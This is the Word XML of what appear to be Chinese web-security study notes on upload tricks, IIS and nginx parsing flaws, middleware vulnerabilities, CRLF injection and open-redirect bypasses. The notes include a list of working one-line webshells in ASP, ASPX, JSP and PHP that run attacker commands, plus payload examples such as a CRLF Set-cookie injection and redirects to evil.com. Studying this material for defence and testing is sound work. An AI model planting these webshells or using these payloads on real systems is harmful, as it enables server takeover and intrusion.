    <w:p w14:paraId="4E8028A6" w14:textId="77777777" w:rsidR="00BC3FCD" w:rsidRDefault="00BC3FCD" w:rsidP="00BC3FCD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>这个时候就上传一个文件名字是</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pino</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>，这个时候我们上传一个文件名字叫做</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pino</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>的文件，不要后缀名，然后里面是一句话木马，用菜刀连接，可以成功！</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A44DFC" w14:textId="77777777" w:rsidR="00BC3FCD" w:rsidRDefault="00BC3FCD" w:rsidP="00BC3FCD">
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1loh5"/>
        </w:rPr>
        <w:t>0人点赞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5082AE" w14:textId="77777777" w:rsidR="00BC3FCD" w:rsidRDefault="00C51675" w:rsidP="00BC3FCD">
      <w:hyperlink r:id="rId100" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidR="00BC3FCD">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>Web安全</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4AB227A6" w14:textId="77777777" w:rsidR="00BC3FCD" w:rsidRPr="00F3602C" w:rsidRDefault="00BC3FCD" w:rsidP="00BC3FCD">
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA7EE5C" w14:textId="77777777" w:rsidR="00BC3FCD" w:rsidRPr="00BC3FCD" w:rsidRDefault="00BC3FCD" w:rsidP="007F7103"/>
    <w:p w14:paraId="58701E34" w14:textId="77777777" w:rsidR="00126765" w:rsidRDefault="00126765" w:rsidP="00126765">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编辑器漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6043A879" w14:textId="77777777" w:rsidR="002A3401" w:rsidRPr="002A3401" w:rsidRDefault="002A3401" w:rsidP="002A3401">
      <w:r w:rsidRPr="002110F6">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>https://bbs.ichunqiu.com/forum.php?mod=viewthread&amp;tid=6419&amp;highlight=%E7%BC%96%E8</w:t>
      </w:r>
      <w:r w:rsidRPr="002A3401">
        <w:lastRenderedPageBreak/>
        <w:t>%BE%91%E5%99%A8%E6%BC%8F%E6%B4%9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93B8B8" wp14:editId="5F22252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74310" cy="215455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2644" w14:textId="77777777" w:rsidR="002A3401" w:rsidRPr="002A3401" w:rsidRDefault="007A3227" w:rsidP="002A3401">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251673600" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3BF795B1" wp14:editId="2436894F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5274310" cy="364617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FBF4A" w14:textId="77777777" w:rsidR="00126765" w:rsidRDefault="00126765" w:rsidP="00126765"/>
    <w:p w14:paraId="355A69C0" w14:textId="77777777" w:rsidR="007A3227" w:rsidRDefault="007A3227" w:rsidP="00126765"/>
    <w:p w14:paraId="6897CBEE" w14:textId="77777777" w:rsidR="007A3227" w:rsidRDefault="007A3227" w:rsidP="00126765"/>
    <w:p w14:paraId="227759DB" w14:textId="77777777" w:rsidR="007A3227" w:rsidRDefault="007A3227" w:rsidP="00126765"/>
    <w:p w14:paraId="57BEEBB7" w14:textId="77777777" w:rsidR="007A3227" w:rsidRDefault="007A3227" w:rsidP="00126765"/>
    <w:p w14:paraId="5265BE6B" w14:textId="77777777" w:rsidR="007A3227" w:rsidRDefault="007A3227" w:rsidP="00126765"/>
    <w:p w14:paraId="24470124" w14:textId="77777777" w:rsidR="007A3227" w:rsidRDefault="007A3227" w:rsidP="00126765"/>
    <w:p w14:paraId="530375A1" w14:textId="77777777" w:rsidR="007A3227" w:rsidRDefault="007A3227" w:rsidP="00126765"/>
    <w:p w14:paraId="46C47A21" w14:textId="77777777" w:rsidR="007A3227" w:rsidRDefault="007A3227" w:rsidP="00126765"/>
    <w:p w14:paraId="7A8E1941" w14:textId="77777777" w:rsidR="007A3227" w:rsidRDefault="007A3227" w:rsidP="00126765"/>
    <w:p w14:paraId="386BC794" w14:textId="77777777" w:rsidR="007A3227" w:rsidRDefault="007A3227" w:rsidP="00126765"/>
    <w:p w14:paraId="19D44113" w14:textId="77777777" w:rsidR="007A3227" w:rsidRDefault="007A3227" w:rsidP="00126765"/>
    <w:p w14:paraId="7ED1343D" w14:textId="77777777" w:rsidR="007A3227" w:rsidRDefault="007A3227" w:rsidP="007A3227">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>中间件漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACE0D29" w14:textId="77777777" w:rsidR="00F922B5" w:rsidRDefault="00C51675" w:rsidP="00F922B5">
      <w:hyperlink r:id="rId103" w:history="1">
        <w:r w:rsidR="00F922B5" w:rsidRPr="003B6A56">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://www.freebuf.com/articles/web/192063.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0DDBA142" w14:textId="77777777" w:rsidR="00F922B5" w:rsidRPr="00F922B5" w:rsidRDefault="00F922B5" w:rsidP="00F922B5"/>
    <w:p w14:paraId="3DC61FC4" w14:textId="77777777" w:rsidR="007A3227" w:rsidRDefault="007A3227" w:rsidP="007A3227">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A3227">
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>IIS</w:t>
      </w:r>
      <w:r w:rsidR="009B1D8E">
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BD8448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PUT漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2588B572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短</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F922B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>文件名猜解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922B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3、远程代码执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A5907D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解析漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A4B61E" w14:textId="77777777" w:rsidR="00F922B5" w:rsidRPr="00F922B5" w:rsidRDefault="00F922B5" w:rsidP="007A3227">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13EB8B45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 6.0 在处理含有特殊符号的文件路径时会出现逻辑错误，从而造成文件解析漏洞。这一漏洞有两种完全不同的利用方式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4A9EE5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/test.asp/test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该目录中的任何文件都被 IIS 当作 asp 程序执行（特殊符号是“/”）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBEA650" w14:textId="77777777" w:rsidR="00A538A2" w:rsidRDefault="00A538A2" w:rsidP="00A538A2">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/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asp;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虽然该文件真正的后缀名是 “.jpg”，但由于含有特殊符号</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">;”，仍会被 IIS </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>当做</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> asp 程序执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFF0CD9" w14:textId="77777777" w:rsidR="00A538A2" w:rsidRDefault="00A538A2" w:rsidP="00A538A2">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="269CCD1B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7.5 文件解析漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68754A6A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jpg/.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B4BAE4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URL 中文件后缀是 .php ，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便无论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该文件是否存在，都直接交给 php 处理，而 php 又默认开启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cgi.fix_pathinfo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,会对文件进行“修理”，可谓“修理”？举个例子，当 php 遇到路径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时，若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不存在，则会去掉最后的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，然后判断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是否存在，若存在，则把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当作文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E72BCBC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若有文件 test.jpg ，访问时在其后加 /.php ，便可以把 “test.jpg/.php” 交给 php ，php 修理文件路径 “test.jpg/.php” 得到 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test.jpg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 ，该文件存在，便把该文件作为 php 程序执行了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BF2E2B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B1876" w14:textId="77777777" w:rsidR="00A538A2" w:rsidRPr="00A538A2" w:rsidRDefault="00A538A2" w:rsidP="007A3227">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50C655D6" w14:textId="77777777"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sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="009B1D8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>eblogic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="63D7CCF4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14:paraId="68DEA12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SSRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD9405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任意文件上传</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C85338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war后门文件部署</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D167C2F" w14:textId="77777777" w:rsidR="00F922B5" w:rsidRPr="00F922B5" w:rsidRDefault="00F922B5" w:rsidP="00126765">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12A7157B" w14:textId="77777777" w:rsidR="007A3227" w:rsidRDefault="007A3227" w:rsidP="00126765">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B1D8E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="009B1D8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>omcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEFD3A5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远程代码执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4197311D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14:paraId="60440D02" w14:textId="77777777" w:rsidR="00F922B5" w:rsidRPr="00F922B5" w:rsidRDefault="00F922B5" w:rsidP="00126765">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DB40003" w14:textId="77777777"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rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Jboss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6D713759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14:paraId="2B653D6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14:paraId="65F08961" w14:textId="77777777" w:rsidR="00F922B5" w:rsidRPr="00F922B5" w:rsidRDefault="00F922B5" w:rsidP="00126765">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57D33198" w14:textId="77777777" w:rsidR="00F922B5" w:rsidRDefault="00F922B5" w:rsidP="001267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ginx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C226883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文件解析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1050B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14:paraId="1FF46DBF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CRLF注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F22EAE3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目录穿越</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7999F0A3" w14:textId="77777777" w:rsidR="00F922B5" w:rsidRPr="009B1D8E" w:rsidRDefault="00F922B5" w:rsidP="00126765">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21B185E4" w14:textId="77777777" w:rsidR="007A3227" w:rsidRDefault="007A3227" w:rsidP="00126765">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B1D8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Apache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326A4C3A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解析漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FB231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14:paraId="677DF0E9" w14:textId="77777777" w:rsidR="00F922B5" w:rsidRPr="009B1D8E" w:rsidRDefault="00F922B5" w:rsidP="00126765">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65900664" w14:textId="77777777" w:rsidR="007A3227" w:rsidRDefault="00B5008B" w:rsidP="00B5008B">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t>LRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61520BCF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举个例子，一般网站会在HTTP头中用Location: http://baidu.com这种方式来进行302跳转，所以我们能控制的内容就是Location:后面的XXX某个网址。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239BEA1B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所以一个正常的302跳转包是这样：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F70C27C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14:paraId="13E1DD20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14:paraId="5AECD271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14:paraId="4A520D45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14:paraId="48D3F033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14:paraId="05B2B018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Location: http://www.sina.com.cn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331A3AD9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但如果我们输入的是</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10505E2B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http://www.sina.com.cn</w:t>
      </w:r>
      <w:r w:rsidRPr="00B5008B">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>%0a</w:t>
      </w:r>
      <w:r w:rsidRPr="00B5008B">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Set-cookie:JSPSESSID%3Dwooyun</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76394819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注入了一个换行，此时的返回包就会变成这样： </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8FD4EE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14:paraId="3EE86D07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14:paraId="75AB72B7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14:paraId="4D5CDA21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14:paraId="7E29035E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14:paraId="0673361F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Location: http://www.sina.com.cn </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEFF83D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Set-cookie: JSPSESSID=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B5008B">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>wooyun</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6D12FFBE" w14:textId="77777777" w:rsidR="00B5008B" w:rsidRPr="00B5008B" w:rsidRDefault="00B5008B" w:rsidP="00B5008B"/>
    <w:p w14:paraId="0CEA1616" w14:textId="77777777" w:rsidR="007A3227" w:rsidRDefault="007A3227" w:rsidP="00126765"/>
    <w:p w14:paraId="0B5DF96D" w14:textId="77777777" w:rsidR="007A3227" w:rsidRDefault="007A3227" w:rsidP="00126765"/>
    <w:p w14:paraId="2F367D40" w14:textId="77777777" w:rsidR="00091445" w:rsidRDefault="00091445" w:rsidP="00126765"/>
    <w:p w14:paraId="586FD1FF" w14:textId="77777777" w:rsidR="00091445" w:rsidRDefault="00091445" w:rsidP="00126765"/>
    <w:p w14:paraId="54D803FE" w14:textId="77777777" w:rsidR="00091445" w:rsidRDefault="00091445" w:rsidP="00126765"/>
    <w:p w14:paraId="7E1E17BD" w14:textId="77777777" w:rsidR="00091445" w:rsidRDefault="00091445" w:rsidP="00091445">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>一句话脚本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6381A026" w14:textId="77777777" w:rsidR="00091445" w:rsidRDefault="00091445" w:rsidP="00091445">
      <w:r>
        <w:t>ASP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE9C09F" w14:textId="77777777" w:rsidR="00091445" w:rsidRDefault="00091445" w:rsidP="00091445">
      <w:r>
        <w:t>&lt;%eval request ("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>")%</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688F8666" w14:textId="77777777" w:rsidR="00091445" w:rsidRDefault="00091445" w:rsidP="00091445"/>
    <w:p w14:paraId="6523F3F5" w14:textId="77777777" w:rsidR="00091445" w:rsidRDefault="00091445" w:rsidP="00091445">
      <w:r>
        <w:t># ASPX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F52F657" w14:textId="77777777" w:rsidR="00091445" w:rsidRDefault="00091445" w:rsidP="00091445">
      <w:r>
        <w:t>&lt;%@ Page Language="Jscript"%&gt; &lt;%</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>eval(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>Request.Item</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>["</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"],"unsafe");%&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC13682" w14:textId="77777777" w:rsidR="00091445" w:rsidRDefault="00091445" w:rsidP="00091445"/>
    <w:p w14:paraId="3B54D6F8" w14:textId="77777777" w:rsidR="00091445" w:rsidRDefault="00091445" w:rsidP="00091445">
      <w:r>
        <w:t># JSP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C7B558" w14:textId="77777777" w:rsidR="00091445" w:rsidRDefault="00091445" w:rsidP="00091445">
      <w:r>
        <w:t>&lt;%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Runtime.getRuntime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>).exec</w:t>
      </w:r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i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">"));%&gt;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4884D539" w14:textId="77777777" w:rsidR="00091445" w:rsidRDefault="00091445" w:rsidP="00091445"/>
    <w:p w14:paraId="2AF4C6E5" w14:textId="77777777" w:rsidR="00091445" w:rsidRDefault="00091445" w:rsidP="00091445">
      <w:r>
        <w:t># PHP -&gt; REQUEST是在网页端输入变量访问，POST则是通过工具连接，基于C/S架构</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7F1B35" w14:textId="77777777" w:rsidR="00091445" w:rsidRDefault="00091445" w:rsidP="00091445">
      <w:r>
        <w:t>&lt;?php @eval($_POST['</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>']);?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264375D4" w14:textId="77777777" w:rsidR="00091445" w:rsidRDefault="00091445" w:rsidP="00091445">
      <w:r>
        <w:t>&lt;?php eval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  # eval,使用php函数,如</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>phpinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050C1AFD" w14:textId="77777777" w:rsidR="00091445" w:rsidRDefault="00091445" w:rsidP="00091445">
      <w:r>
        <w:t>&lt;?php system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# system,使用Linux系统命令,如ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C740EA3" w14:textId="77777777" w:rsidR="00F823C0" w:rsidRPr="00F823C0" w:rsidRDefault="00F823C0" w:rsidP="00091445">
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>&lt;?php echo system($_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>GET[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>]);?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B625BEE" w14:textId="77777777" w:rsidR="005474CB" w:rsidRDefault="005474CB" w:rsidP="00091445"/>
    <w:p w14:paraId="176D95B3" w14:textId="77777777" w:rsidR="005474CB" w:rsidRDefault="005474CB" w:rsidP="00091445"/>
    <w:p w14:paraId="6214BE81" w14:textId="77777777" w:rsidR="005474CB" w:rsidRDefault="005474CB" w:rsidP="005474CB">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ypass绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DD49D5" w14:textId="77777777" w:rsidR="005474CB" w:rsidRDefault="00C51675" w:rsidP="005474CB">
      <w:hyperlink r:id="rId104" w:history="1">
        <w:r w:rsidR="00664EC7" w:rsidRPr="002B6A4B">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://www.t00ls.net/articles-46165.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="54664A97" w14:textId="77777777" w:rsidR="00664EC7" w:rsidRDefault="00C51675" w:rsidP="005474CB">
      <w:hyperlink r:id="rId105" w:history="1">
        <w:r w:rsidR="00664EC7" w:rsidRPr="002B6A4B">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://blog.csdn.net/huanghelouzi/article/details/82995313</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7348775E" w14:textId="77777777" w:rsidR="00664EC7" w:rsidRDefault="00664EC7" w:rsidP="005474CB"/>
    <w:p w14:paraId="3E183C4C" w14:textId="77777777" w:rsidR="00D11994" w:rsidRDefault="00D11994" w:rsidP="005474CB"/>
    <w:p w14:paraId="42CDFFDC" w14:textId="77777777" w:rsidR="00BB29BE" w:rsidRDefault="00BB29BE" w:rsidP="00A14128">
      <w:pPr>
        <w:pStyle w:val="2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跳转</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DD6300" w14:textId="77777777" w:rsidR="00BB29BE" w:rsidRDefault="00BB29BE" w:rsidP="00BB29BE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2BED2A" w14:textId="77777777" w:rsidR="00BB29BE" w:rsidRPr="00A14128" w:rsidRDefault="00BB29BE" w:rsidP="00A14128">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r w:rsidRPr="00A14128">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1. 直接跳转</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233628F8" w14:textId="77777777"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没做任何限制，参数后直接跟要跳转过去的网址就行：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCE7B39" w14:textId="77777777" w:rsidR="00BB29BE" w:rsidRDefault="00BB29BE" w:rsidP="00BB29BE">
      <w:pPr>
        <w:pStyle w:val="l0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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://www.evil.com/untrust.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5A1E56" w14:textId="77777777" w:rsidR="00BB29BE" w:rsidRPr="00A14128" w:rsidRDefault="00BB29BE" w:rsidP="00A14128">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r w:rsidRPr="00A14128">
        <w:lastRenderedPageBreak/>
        <w:t>2. 协议一致性</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4AA0FC" w14:textId="77777777"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当程序员校验跳转的网址协议必须为https时(有时候跳转不过去不会给提示)：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0EB1ED" w14:textId="77777777" w:rsidR="00BB29BE" w:rsidRDefault="00BB29BE" w:rsidP="00BB29BE">
      <w:pPr>
        <w:pStyle w:val="l0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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s://www.evil.com/untrust.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CC846D" w14:textId="77777777" w:rsidR="00BB29BE" w:rsidRDefault="00BB29BE" w:rsidP="00BB29BE">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="66D9E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3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C010D55" w14:textId="77777777" w:rsidR="00BB29BE" w:rsidRDefault="00C51675" w:rsidP="00BB29BE">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="93A1A1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId106" w:history="1">
